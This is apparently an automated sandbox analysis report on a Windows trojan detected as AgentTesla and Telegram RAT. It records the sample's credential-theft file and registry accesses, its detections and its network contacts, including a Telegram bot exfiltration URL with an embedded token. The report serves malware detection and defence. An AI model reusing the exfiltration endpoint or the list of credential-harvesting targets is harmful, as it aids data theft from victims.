                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Users\user\Desktop\wKQpOZ58Gl.exe VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wKQpOZ58Gl.exe PID: 3676, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wKQpOZ58Gl.exe PID: 3760, type: MEMORYSTR
                Yara detected AgentTesla
                Source: Yara matchFile source: 0.2.wKQpOZ58Gl.exe.4084120.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.wKQpOZ58Gl.exe.404f900.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.wKQpOZ58Gl.exe.4084120.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.wKQpOZ58Gl.exe.404f900.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.wKQpOZ58Gl.exe.40186e0.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wKQpOZ58Gl.exe PID: 3676, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wKQpOZ58Gl.exe PID: 3760, type: MEMORYSTR
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: Yara matchFile source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wKQpOZ58Gl.exe PID: 3760, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wKQpOZ58Gl.exe PID: 3676, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wKQpOZ58Gl.exe PID: 3760, type: MEMORYSTR
                Yara detected AgentTesla
                Source: Yara matchFile source: 0.2.wKQpOZ58Gl.exe.4084120.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.wKQpOZ58Gl.exe.404f900.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.wKQpOZ58Gl.exe.4084120.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.wKQpOZ58Gl.exe.404f900.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.wKQpOZ58Gl.exe.40186e0.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wKQpOZ58Gl.exe PID: 3676, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wKQpOZ58Gl.exe PID: 3760, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation                		1
                Scheduled Task/Job                		111
                Process Injection                		11
                Disable or Modify Tools                		2
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		Exfiltration Over Other Network Medium1
                Web Service                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Scheduled Task/Job                		Boot or Logon Initialization Scripts1
                Scheduled Task/Job                		11
                Deobfuscate/Decode Files or Information                		111
                Input Capture                		114
                System Information Discovery                		Remote Desktop Protocol2
                Data from Local System                		Exfiltration Over Bluetooth11
                Encrypted Channel                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information                		1
                Credentials in Registry                		1
                Query Registry                		SMB/Windows Admin Shares1
                Email Collection                		Automated Exfiltration2
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                Software Packing                		NTDS311
                Security Software Discovery                		Distributed Component Object Model111
                Input Capture                		Scheduled Transfer3
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Timestomp                		LSA Secrets1
                Process Discovery                		SSH1
                Clipboard Data                		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Masquerading                		Cached Domain Credentials131
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items131
                Virtualization/Sandbox Evasion                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
                Process Injection                		Proc Filesystem1
                Remote System Discovery                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 679221 Sample: wKQpOZ58Gl Startdate: 05/08/2022 Architecture: WINDOWS Score: 100 37 Snort IDS alert for network traffic 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Antivirus detection for dropped file 2->41 43 13 other signatures 2->43 7 wKQpOZ58Gl.exe 7 2->7         started        process3 file4 25 C:\Users\user\AppData\...\kqruryFrIFc.exe, PE32 7->25 dropped 27 C:\Users\...\kqruryFrIFc.exe:Zone.Identifier, ASCII 7->27 dropped 29 C:\Users\user\AppData\Local\...\tmp92BC.tmp, XML 7->29 dropped 31 C:\Users\user\AppData\...\wKQpOZ58Gl.exe.log, ASCII 7->31 dropped 45 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->45 47 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->47 49 Uses schtasks.exe or at.exe to add and modify task schedules 7->49 51 2 other signatures 7->51 11 wKQpOZ58Gl.exe 15 6 7->11         started        15 powershell.exe 25 7->15         started        17 schtasks.exe 1 7->17         started        19 wKQpOZ58Gl.exe 7->19         started        signatures5 process6 dnsIp7 33 api.telegram.org 149.154.167.220, 443, 49783, 49785 TELEGRAMRU United Kingdom 11->33 35 192.168.2.1 unknown unknown 11->35 53 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->53 55 Tries to steal Mail credentials (via file / registry access) 11->55 57 Tries to harvest and steal ftp login credentials 11->57 59 2 other signatures 11->59 21 conhost.exe 15->21         started        23 conhost.exe 17->23         started        signatures8 process9

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                wKQpOZ58Gl.exe58%VirustotalBrowse
                wKQpOZ58Gl.exe26%MetadefenderBrowse
                wKQpOZ58Gl.exe69%ReversingLabsWin32.Trojan.Woreflint
                wKQpOZ58Gl.exe100%AviraTR/AD.AgentTesla.gcmza
                wKQpOZ58Gl.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\kqruryFrIFc.exe100%AviraTR/AD.AgentTesla.gcmza
                C:\Users\user\AppData\Roaming\kqruryFrIFc.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\kqruryFrIFc.exe58%VirustotalBrowse
                C:\Users\user\AppData\Roaming\kqruryFrIFc.exe26%MetadefenderBrowse
                C:\Users\user\AppData\Roaming\kqruryFrIFc.exe69%ReversingLabsWin32.Trojan.Woreflint

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                14.0.wKQpOZ58Gl.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                https://api.ipify.org%%startupfolder%0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://dhp6cb4d3QXSx5sRl.net0%Avira URL Cloudsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://sOkRpA.com0%VirustotalBrowse
                http://sOkRpA.com0%Avira URL Cloudsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                https://api.telegram.org40%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                https://api.ipify.org%0%URL Reputationsafe
                https://api.telegram.orgD80%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                api.telegram.org
                		149.154.167.220
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocumentfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.apache.org/licenses/LICENSE-2.0wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.comwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/wKQpOZ58Gl.exe, 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bThewKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.orgwKQpOZ58Gl.exe, 0000000E.00000002.639234728.0000000002C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocumentdocument-----wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers?wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwwKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.tiro.comwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://github.com/princ3od/MaterialSurfaceKhttps://www.linkedin.com/in/princ3od/%princ3odwKQpOZ58Gl.exe, kqruryFrIFc.exe.0.drfalse
                                      		high
                                      http://www.fontbureau.com/designerswKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.ipify.org%%startupfolder%wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		low
                                        http://www.goodfont.co.krwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://dhp6cb4d3QXSx5sRl.netwKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639326716.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639182904.0000000002C49000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.carterandcone.comlwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sajatypeworks.comwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.typography.netDwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNwKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
